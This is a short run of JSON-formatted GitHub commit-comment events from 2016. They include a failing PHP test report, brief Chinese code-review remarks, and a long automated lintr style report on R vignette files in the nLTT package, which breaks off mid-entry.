{"id":"4560246259","type":"CommitCommentEvent","actor":{"login":"rybakit"},"repo":{"name":"opensoft/doctrine-postgres-types"},"payload":{"comment":{"id":19013700,"position":null,"line":null,"path":null,"commit_id":"7e69bdfeb2ae61c2f1e90872370cdf0135fb3006","created_at":"2016-09-14T07:14:47Z","updated_at":"2016-09-14T07:14:47Z","body":"@richardfullmer looks like this change broke a test:\r\n```\r\n1) Doctrine\\Tests\\DBAL\\Types\\TsqueryTest::testConvertToDatabaseValueSQL\r\nFailed asserting that two strings are equal.\r\n--- Expected\r\n+++ Actual\r\n@@ @@\r\n-'to_tsquery(test)'\r\n+'plainto_tsquery(test)'\r\n```"}},"created_at":"2016-09-14T07:14:47Z"}
{"id":"4560247476","type":"CommitCommentEvent","actor":{"login":"yclrick"},"repo":{"name":"yclrick/UpdateApp"},"payload":{"comment":{"id":19013703,"position":null,"line":null,"path":null,"commit_id":"b2d9f4cfbe499e88b42971d70ed524245d7c3f91","created_at":"2016-09-14T07:15:06Z","updated_at":"2016-09-14T07:15:06Z","body":"状态栏提示"}},"created_at":"2016-09-14T07:15:06Z"}
{"id":"4560247562","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013704,"position":445,"line":445,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:15:09Z","updated_at":"2016-09-14T07:15:09Z","body":"这个。。。。不能做事件代理吗，这个事件开销有点儿大，如果有成百上千个cicle，难道都要绑一次？"}},"created_at":"2016-09-14T07:15:09Z"}
{"id":"4560248296","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19013706,"position":null,"line":null,"path":null,"commit_id":"72fec5bbf9851195b423f564d1e7a662f0ea1f60","created_at":"2016-09-14T07:15:19Z","updated_at":"2016-09-14T07:15:19Z","body":"[inst/doc/trees_with_root_edge.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/trees_with_root_edge.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/trees_with_root_edge.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/trees_with_root_edge.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:14:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/trees_with_root_edge.R#L14) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:18:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/trees_with_root_edge.R#L18) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/trees_with_root_edge.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:25:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/trees_with_root_edge.R#L25) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:3:9:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_get_average_nltt.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L14) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:16:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L16) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L24) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:29:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L29) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:32:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L32) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:33:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:36:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L36) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:38:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L38) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:46:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​newick2 <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:50:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L50) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L52) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:54:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L54) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:62:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L62) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:70:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L70) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:71:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L71) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:73:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L73) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:74:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L74) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:76:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L76) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:79:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L79) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:81:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_average_nltt.R#L81) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:4:9:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_get_nltt_values.R:8:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L8) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L17) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L28) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:53:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L28) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:30:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L30) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:32:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L32) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:34:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L34) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:37:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L37) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:53:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L43) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:45:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L45) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:46:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:50:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L50) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:53:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L53) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 